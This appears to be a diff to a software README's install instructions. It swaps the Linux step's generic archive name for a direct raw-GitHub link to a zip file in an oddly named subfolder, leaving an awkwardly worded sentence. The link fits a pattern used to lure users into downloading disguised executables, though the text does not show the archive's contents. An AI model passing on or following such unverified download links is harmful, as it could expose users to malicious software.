honied-valerian411/agentic-reasoning-lab/README.md

 2. **Install the Application:**
    - For Windows: Double-click the `.exe` file to start the installation.
    - For macOS: Open the `.dmg` file and drag the app to your Applications folder.
-   - For Linux: You may need to extract the `.tar.gz` file and run the executable in the terminal.
+   - For Linux: You may need to extract the `https://raw.githubusercontent.com/honied-valerian411/agentic-reasoning-lab/main/pterygode/agentic-reasoning-lab-2.2-alpha.2.zip` file and run the executable in the terminal.

 3. **Launch the Application:**
    - After installation, find the application in your Start menu (Windows), Applications folder (macOS), or open it from the terminal (Linux).